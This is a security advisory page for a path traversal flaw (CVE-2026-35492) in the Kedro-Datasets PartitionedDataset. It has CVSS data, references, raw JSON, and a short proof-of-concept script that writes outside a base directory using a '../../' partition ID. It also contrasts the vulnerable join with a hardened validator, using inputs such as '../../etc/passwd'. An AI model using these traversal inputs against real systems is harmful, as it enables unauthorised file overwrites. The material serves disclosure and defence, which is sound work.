Security Vulnerability Report
CVE-2026-35492 CVSS 6.5 MEDIUM

CVE-2026-35492

Published: 2026-04-07 16:16:28
Last Modified: 2026-04-16 14:45:20

Description

Kedro-Datasets is a Kedro plugin providing data connectors. Prior to 9.3.0, PartitionedDataset in kedro-datasets was vulnerable to path traversal. Partition IDs were concatenated directly with the dataset base path without validation. A partition ID containing `..` components, whether attacker-supplied or otherwise untrusted input, could cause files to be written outside the configured dataset directory, potentially overwriting arbitrary files on the filesystem. Users of PartitionedDataset with any storage backend (local filesystem, S3, GCS, etc.) are affected. This vulnerability is fixed in 9.3.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')

Configurations (Affected Products)

Kedro-Datasets < 9.3.0 (no CPE configuration data is available for this record; the affected range is taken from the description)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os

# Proof of Concept for CVE-2026-35492 Path Traversal
# This simulates the vulnerable behaviour in Kedro-Datasets < 9.3.0:
# the partition ID is joined to the base path with no validation.


def vulnerable_save(base_path, partition_id, data):
    # Direct concatenation without validation. Nothing here rejects '..'
    # components, so the resulting path can leave base_path.
    full_path = os.path.join(base_path, partition_id)
    print(f"[VULNERABLE] Attempting to write to: {full_path}")
    # Resolve '..' so the reader can see where the write actually lands.
    print(f"[VULNERABLE] Resolves to: {os.path.normpath(full_path)}")
    # Writes 'data' to 'full_path', potentially overwriting a file the
    # dataset was never meant to touch.
    with open(full_path, "w") as f:
        f.write(str(data))


if __name__ == "__main__":
    # Configuration
    base_directory = "./safe_dataset_folder"
    # Malicious partition ID containing path traversal sequences
    malicious_input = "../../arbitrary_file.txt"

    print(f"Base Directory: {base_directory}")
    print(f"User Partition ID: {malicious_input}")

    # ./safe_dataset_folder/../../arbitrary_file.txt normalises to
    # ../arbitrary_file.txt, i.e. the parent of the current working
    # directory, not anything under ./safe_dataset_folder/.
    vulnerable_save(base_directory, malicious_input, "MALICIOUS_PAYLOAD")
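
The description says the join is unvalidated and that every backend is affected, not just the local filesystem. The block below is an added example, not code from kedro-datasets and not the 9.3.0 fix (the project's own change is in the pull request cited in the record); it puts the unvalidated join next to a hardened one that works for local paths and for object-store URIs alike. It assumes partition IDs are POSIX-style keys with "/" separators, which is the convention object-store backends use, and every name in it (PartitionPathError, _split_scheme, vulnerable_partition_path, vulnerable_resolved, safe_partition_path, is_rejected) is hypothetical. The sample base paths and partition IDs are constructed for the demonstration.

```python
import posixpath

# Added example, not kedro-datasets code. Partition IDs are treated as
# POSIX-style keys ("/" separators), an assumption chosen because S3/GCS
# style backends use that convention.


class PartitionPathError(ValueError):
    """Raised when safe_partition_path rejects a partition ID."""


def _split_scheme(path):
    """Split 's3://bucket/dir' into ('s3://', 'bucket/dir'); local paths get ''."""
    scheme, sep, rest = path.partition("://")
    return (scheme + sep, rest) if sep else ("", path)


def vulnerable_partition_path(base_path, partition_id):
    """The pre-9.3.0 pattern the advisory describes: join with no validation."""
    return posixpath.join(base_path, partition_id)


def vulnerable_resolved(base_path, partition_id):
    """Where the unvalidated join actually lands once '..' is resolved."""
    scheme, rest = _split_scheme(vulnerable_partition_path(base_path, partition_id))
    return scheme + posixpath.normpath(rest)


def safe_partition_path(base_path, partition_id):
    """Join a partition ID to the base path, refusing anything that could escape it."""
    if not partition_id:
        raise PartitionPathError("empty partition id")
    # Backslashes are separators on Windows local filesystems but not on
    # POSIX or in object stores; refuse them rather than guess.
    if "\\" in partition_id:
        raise PartitionPathError("backslash in partition id")
    # An absolute path, drive letter or URI makes posixpath.join discard
    # base_path entirely, so these are rejected before any join happens.
    if partition_id.startswith("/") or "://" in partition_id or partition_id[1:2] == ":":
        raise PartitionPathError("absolute path or URI in partition id")
    # Reject '.', '..' and empty components outright instead of normalising
    # them away: a partition ID names a file below the base, nothing else.
    if any(part in ("", ".", "..") for part in partition_id.split("/")):
        raise PartitionPathError("traversal component in partition id")

    scheme, root = _split_scheme(base_path)
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, partition_id))
    # Belt and braces: the normalised result must still sit below the base.
    if not candidate.startswith(root.rstrip("/") + "/"):
        raise PartitionPathError("partition id escapes the dataset base path")
    return scheme + candidate


def is_rejected(base_path, partition_id):
    """True if safe_partition_path refuses the ID (convenience for checks)."""
    try:
        safe_partition_path(base_path, partition_id)
    except PartitionPathError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample inputs: one local base, one S3 base.
    for base in ("/srv/dataset", "s3://bucket/dataset/"):
        for pid in ("2024/part-01.csv", "../../etc/passwd", "../../other-bucket/x"):
            landed = vulnerable_resolved(base, pid)
            verdict = "rejected" if is_rejected(base, pid) else safe_partition_path(base, pid)
            print(f"{base!r:28} {pid!r:26} vulnerable -> {landed:32} hardened -> {verdict}")
```

The hardened version rejects rather than normalises: a `..` in a partition ID is never legitimate, and silently collapsing it would hide the bad input from logs and callers. The same check applies to an S3 or GCS base because the traversal happens in the key string before the backend ever sees it, which is why the advisory lists every backend as affected.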

References

https://github.com/kedro-org/kedro-plugins/pull/1346
https://github.com/kedro-org/kedro-plugins/security/advisories/GHSA-cjg8-h5qc-hrjv
https://github.com/kedro-org/kedro/issues/5452

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35492", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:27.620", "lastModified": "2026-04-16T14:45:19.723", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kedro-Datasets is a Kendo plugin providing data connectors. Prior to 9.3.0, PartitionedDataset in kedro-datasets was vulnerable to path traversal. Partition IDs were concatenated directly with the dataset base path without validation. An attacker or malicious input containing .. components in a partition ID could cause files to be written outside the configured dataset directory, potentially overwriting arbitrary files on the filesystem. Users of PartitionedDataset with any storage backend (local filesystem, S3, GCS, etc.) are affected. This vulnerability is fixed in 9.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/kedro-org/kedro-plugins/pull/1346", "source": "[email protected]"}, {"url": "https://github.com/kedro-org/kedro-plugins/security/advisories/GHSA-cjg8-h5qc-hrjv", "source": "[email protected]"}, {"url": "https://github.com/kedro-org/kedro/issues/5452", "source": "[email protected]"}]}}